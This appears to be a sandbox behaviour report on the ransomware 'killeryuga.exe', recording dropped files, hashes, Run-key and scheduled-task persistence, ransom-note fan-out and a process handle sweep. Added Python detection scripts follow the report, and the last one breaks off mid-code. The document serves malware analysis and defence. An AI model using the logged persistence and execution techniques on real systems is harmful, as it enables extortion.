killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00984028 0x009B338E Marked Executable - 32-bit - False
buffer 0x00984028 0x009B338E Content Changed - 32-bit 0x00984028 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\_readme.txt 1.08 KB MD5: a8d93f8169180c8bd8e1520498934801
SHA1: 5203d1601739402e0d9ba9301fc9c96c90837953
SHA256: 6b9cef14ba78d273cddb4f9d6d1dc894077753da29a8d77ef93d1f5c743fb453
SSDeep: 24:FS2zmHPnIekFQjhRe9bgnYLuWa1mFRqrl3W4kA+GTCkF5M2/k6gJ4Id:DzmHfv0p6WmPFWrDGTFf/kJLd
False
Downloaded Files
Filename File Size Hash Values YARA Match Actions
14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE
False
5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf
False
079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21 153.00 KB MD5: 36185c10c8ccb627648067c8dc5d7e03
SHA1: 9b2435350859250371e00cd52a998f120724e088
SHA256: 079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21
SSDeep: 3072:sSfsyx3qXC9zdmPTN1VVsTxKjW4jC5ELiOdBA:sSRxECkWKq
False
114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK
False
206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20 0.10 KB MD5: bc8dc0185fcf6d2975580c74babacf62
SHA1: 5ffe7319affbbd31ad56f10098ee70b0467a2bda
SHA256: 206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20
SSDeep: 3:YJMLAA9IIOIKdv/1jETnOnJ/H9PQhiSd/6mgdn82FYn:YIzIfIm+OJP9ohiSd65n82in
False
Host Behavior
COM (8)
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4280555 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-03-25T03:38:13 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (197)
Operation Filename Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create <directory>\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
  (43 rows, one per directory, identical apart from the directory; all True except C:\System Volume Information\, which is False)
  C:\
  C:\Boot\
  C:\Boot\cs-CZ\
  C:\Boot\da-DK\
  C:\Boot\de-DE\
  C:\Boot\el-GR\
  C:\Boot\en-US\
  C:\Boot\es-ES\
  C:\Boot\fi-FI\
  C:\Boot\Fonts\
  C:\Boot\fr-FR\
  C:\Boot\hu-HU\
  C:\Boot\it-IT\
  C:\Boot\ja-JP\
  C:\Boot\ko-KR\
  C:\Boot\nb-NO\
  C:\Boot\nl-NL\
  C:\Boot\pl-PL\
  C:\Boot\pt-BR\
  C:\Boot\pt-PT\
  C:\Boot\ru-RU\
  C:\Boot\sv-SE\
  C:\Boot\tr-TR\
  C:\Boot\zh-CN\
  C:\Boot\zh-HK\
  C:\Boot\zh-TW\
  C:\Config.Msi\
  C:\Documents and Settings\
  C:\ProgramData\
  C:\ProgramData\Adobe\
  C:\ProgramData\Documents\
  C:\ProgramData\Favorites\
  C:\ProgramData\Microsoft Help\
  C:\ProgramData\Mozilla\
  C:\ProgramData\Oracle\
  C:\ProgramData\Start Menu\
  C:\ProgramData\Sun\
  C:\ProgramData\Templates\
  C:\Recovery\
  C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\
  C:\System Volume Information\ (False)
  C:\Users\5p5NrGJn0jS HALPmcxz\
  C:\Users\Default\
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d - True 1
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe size = 10240 True 27
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe size = 2560 True 1
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe size = 10240 True 27
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe size = 4608 True 1
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe size = 10240 True 27
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe size = 7680 True 1
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe size = 10240 True 15
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe size = 3072 True 1
Write <directory>\_readme.txt size = 1110 True 1
  (42 rows, one per directory in the list above except C:\System Volume Information\, where the Create failed)
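The File table shows two things worth turning into a reusable check: four executables written in 10240-byte chunks into a freshly created AppData\Local\<GUID>\ directory, and a 1110-byte _readme.txt created in 43 directories across the volume (every write succeeded except under C:\System Volume Information\). The script below is an added example, not part of the VMRay report, that sweeps a directory tree for both patterns: a small file whose name and content are identical across many directories (note fan-out), and MZ executables sitting directly in a GUID-named folder under AppData\Local. The fixture tree it builds in a temporary directory is constructed to mirror the report's layout; the PE stubs are header bytes only, and the note body is filler padded to the observed 1110 bytes.

```python
import hashlib
import os
import re
import tempfile
from collections import defaultdict

GUID_NAME = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
NOTE_MAX_BYTES = 64 * 1024          # ransom notes are small; skip large files when hashing


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_note_fanout(root, min_dirs=5):
    """Return {(lowercased name, sha256): [directories]} for files whose identical
    content appears under the same name in at least min_dirs directories."""
    seen = defaultdict(list)
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > NOTE_MAX_BYTES:
                    continue
                seen[(name.lower(), sha256_file(path))].append(dirpath)
            except OSError:
                continue
    return {key: dirs for key, dirs in seen.items() if len(dirs) >= min_dirs}


def find_guid_dir_executables(root):
    """Return files starting with the MZ header that live directly inside a
    GUID-named directory whose parents are ...\\AppData\\Local."""
    hits = []
    for dirpath, _, files in os.walk(root):
        parts = dirpath.replace("\\", "/").split("/")
        if len(parts) < 3 or not GUID_NAME.match(parts[-1]):
            continue
        if [p.lower() for p in parts[-3:-1]] != ["appdata", "local"]:
            continue
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    if f.read(2) == b"MZ":
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def build_sample_tree():
    """Constructed fixture modelled on the report's File table (not a real infected host)."""
    root = tempfile.mkdtemp(prefix="triage_")
    note = b"ATTENTION!\n" + b"x" * 1099            # 11 + 1099 = 1110 bytes, like the observed note
    for rel in ["", "Boot", "Boot/en-US", "Boot/de-DE", "ProgramData", "Recovery", "Users/Default"]:
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, "_readme.txt"), "wb") as f:
            f.write(note)
    drop = os.path.join(root, "Users", "victim", "AppData", "Local",
                        "31d598d6-7a99-49f9-bbea-5545d7a59a7d")
    os.makedirs(drop)
    for name in ["updatewin1.exe", "updatewin2.exe", "updatewin.exe", "5.exe"]:
        with open(os.path.join(drop, name), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)           # stand-in PE stub: DOS header bytes only
    with open(os.path.join(drop, "settings.json"), "wb") as f:
        f.write(b"{}")                              # non-PE file in the same folder, must not be reported
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for (name, digest), dirs in find_note_fanout(sample_root).items():
        print(f"note fan-out: {name} sha256={digest[:16]}... in {len(dirs)} directories")
    for path in find_guid_dir_executables(sample_root):
        print(f"executable in GUID drop dir: {path}")
```

On a real host point the two functions at a mounted image or the live volume root; hashing only files under 64 KB keeps the sweep fast, and the MZ check catches renamed payloads that an extension filter would miss.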
Registry (4)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
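The COM table records the Task Scheduler calls the sample makes through ITaskService (Connect, GetFolder on the root folder, NewTask, a TASK_TRIGGER_TIME trigger with StartBoundary 2019-03-25T03:38:13, then the Actions collection), and the Registry table records a Run value named SysHelper whose REG_EXPAND_SZ data points at a copy of killeryuga.exe under AppData\Local\<GUID>\ with --AutoStart. Both persistence stores can be audited from disk without the COM API: a registered task is stored as XML under C:\Windows\System32\Tasks, and the Run key can be dumped with reg export. The script below is an added example, not part of the VMRay report. It parses both forms and flags actions whose executable lives in a user-writable profile location or a GUID-named directory. The task XML, its name and its argument are constructed stand-ins (the report does not show the registered task's definition); the Run value is rebuilt from the data in the Registry table, with regedit's hex(2) encoding of REG_EXPAND_SZ produced by the hex2 helper; the OneDrive entry is a constructed benign control.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by task XML files under C:\Windows\System32\Tasks.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristics: locations a standard user can write to, and GUID-named directories
# such as the AppData\Local\<GUID>\ folders in the report.
USER_WRITABLE = re.compile(r"\\(AppData\\(Local|Roaming)|Temp|Downloads|ProgramData|Users\\Public)\\", re.I)
GUID_DIR = re.compile(r"\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)


def split_command(cmdline):
    """Split a Run-key command line into (executable, arguments), honouring a quoted path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"') and '"' in cmdline[1:]:
        end = cmdline.index('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    exe, _, args = cmdline.partition(" ")
    return exe, args


def assess(exe):
    reasons = []
    if USER_WRITABLE.search(exe):
        reasons.append("user-writable location")
    if GUID_DIR.search(exe):
        reasons.append("GUID-named directory")
    return reasons


def parse_reg_export(text):
    """Yield (key, value_name, data) from a `reg export` file. Handles REG_SZ
    ("name"="string") and REG_EXPAND_SZ, which regedit writes as hex(2): UTF-16LE
    bytes continued over several lines with a trailing backslash."""
    text = re.sub(r",\\\r?\n\s*", ",", text)          # re-join continued hex lines
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and '"=' in line:
            name, _, data = line.partition('"=')
            name = name[1:]
            if data.startswith('"'):
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            elif data.lower().startswith("hex(2):"):
                raw = bytes(int(h, 16) for h in data[7:].split(",") if h)
                data = raw.decode("utf-16-le").rstrip("\x00")
            yield key, name, data


def audit_run_key(reg_text):
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not key.lower().endswith("\\currentversion\\run"):
            continue
        exe, args = split_command(data)
        reasons = assess(exe)
        if reasons:
            findings.append({"source": f"run:{name}", "exe": exe, "args": args, "reasons": reasons})
    return findings


def audit_task_xml(xml_text, task_name):
    findings = []
    root = ET.fromstring(xml_text)
    for action in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        exe = action.findtext("t:Command", default="", namespaces=TASK_NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        reasons = assess(exe)
        if reasons:
            findings.append({"source": f"task:{task_name}", "exe": exe, "args": args, "reasons": reasons})
    return findings


def hex2(s):
    """Encode a string the way regedit exports REG_EXPAND_SZ (used to build the sample below)."""
    body = ",".join(f"{b:02x}" for b in (s + "\x00").encode("utf-16-le")) + ","
    chunks = re.findall(r"(?:[0-9a-f]{2},){1,25}", body)
    return "hex(2):" + "\\\n  ".join(chunks).rstrip(",")


# Constructed sample export: the SysHelper data is the value shown in the Registry table.
RUN_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"',
    '"SysHelper"=' + hex2(r'"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart'),
    "",
])

# Constructed task definition: trigger type and StartBoundary follow the COM table,
# the command path follows the Run value; the name and argument are assumptions.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2019-03-25T03:38:13</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe"</Command>
    <Arguments>--Task</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for f in audit_run_key(RUN_EXPORT) + audit_task_xml(TASK_XML, "Time Trigger Task"):
        print(f["source"], f["exe"], f["args"], "; ".join(f["reasons"]))
```

On a live host feed the output of reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run to audit_run_key and each file under C:\Windows\System32\Tasks (read as UTF-16) to audit_task_xml; the GUID-directory heuristic is what separates these entries from ordinary vendor updaters that also live in AppData.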
Process (458)
Operation Process Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe os_pid = 0x9d0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe os_pid = 0x9d8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe show_window = SW_SHOWNORMAL True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe show_window = SW_SHOWNORMAL True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe show_window = SW_SHOWNORMAL True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe show_window = SW_SHOWNORMAL True 1
Enumerate Processes - - True 1
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\program files (x86)\windows photo viewer\departure-wm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft synchronization services\controllers.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows portable devices\evaluating_explosion_former.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\windows photo viewer\kai.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft office\dvd_boom_scale.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\mozilla firefox\adaptation_sleeping_presentations.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\adobe\accommodation-throat-deviation.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows photo viewer\joseph.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows mail\byte-emergency-resulted.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft sql server compact edition\noble-technologies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft sql server compact edition\cardiovascularhear.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\msbuild\assets_portion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\internet explorer\landgovernmental.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\internet explorer\packed bags.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\reference assemblies\tale-plaintiff-basename.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 408
  (44 rows with identical operation, target and access merged; original per-row counts: 1, 8, 1, 1, 3, 287, 12, 12, 9, 3, 1, 6, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 1, 1, 8, 3, 4, 1, 1, 1, 1, 1, 4, 1, 1, 1, 1, 2, 15)
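Three behaviours in the Process table translate directly into endpoint detections: killeryuga.exe relaunching its own image as hidden, detached children; executables started from the AppData\Local\<GUID>\ drop directory; and, after Enumerate Processes, a single process opening every other process on the machine with PROCESS_VM_READ | PROCESS_QUERY_INFORMATION (failing on the protected system processes and succeeding on user-level ones). The code below is an added example, not part of the VMRay report: three rules run over process-creation and process-access telemetry in the shape Sysmon produces (event ID 1 and event ID 10, where the mask appears as GrantedAccess 0x410). The events are constructed for the example; the timestamps, the parent/child wiring and the TOKEN1/TOKEN2 placeholders standing in for the long argument strings are assumptions, while image paths, switches and the target process names follow the report.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Access mask from the Process table: PROCESS_VM_READ (0x10) | PROCESS_QUERY_INFORMATION (0x400).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
SWEEP_MASK = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION        # 0x0410
GUID_DROP_DIR = re.compile(r"\\AppData\\Local\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)


def when(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def detect_self_relaunch(events):
    """Process creates where the child image equals the parent image but the command
    line changed: the killeryuga.exe -> killeryuga.exe --Admin / --ForNetRes / --Service chain."""
    return [e for e in events if e["EventID"] == 1
            and e["Image"].lower() == e["ParentImage"].lower()
            and e["CommandLine"] != e["ParentCommandLine"]]


def detect_guid_dir_exec(events):
    """Process creates whose image lives under ...\\AppData\\Local\\<GUID>\\."""
    return [e for e in events if e["EventID"] == 1 and GUID_DROP_DIR.search(e["Image"])]


def detect_handle_sweep(events, min_targets=10, window=timedelta(seconds=5)):
    """One source opening at least min_targets distinct processes with (at least)
    VM_READ|QUERY_INFORMATION inside `window`. Returns [(source image, distinct targets)]."""
    opens = defaultdict(list)
    for e in events:
        if e["EventID"] != 10:
            continue
        granted = int(e["GrantedAccess"], 16)
        if (granted & SWEEP_MASK) == SWEEP_MASK:            # parenthesised: == binds tighter than &
            opens[e["SourceImage"]].append((when(e), e["TargetImage"].lower()))
    hits = []
    for source, items in opens.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            targets = {t for (ts, t) in items[i:] if ts - start <= window}
            if len(targets) >= min_targets:
                hits.append((source, len(targets)))
                break
    return hits


# Constructed telemetry modelled on the report (not captured events).
USER = r"C:\Users\5p5NrGJn0jS HALPmcxz"
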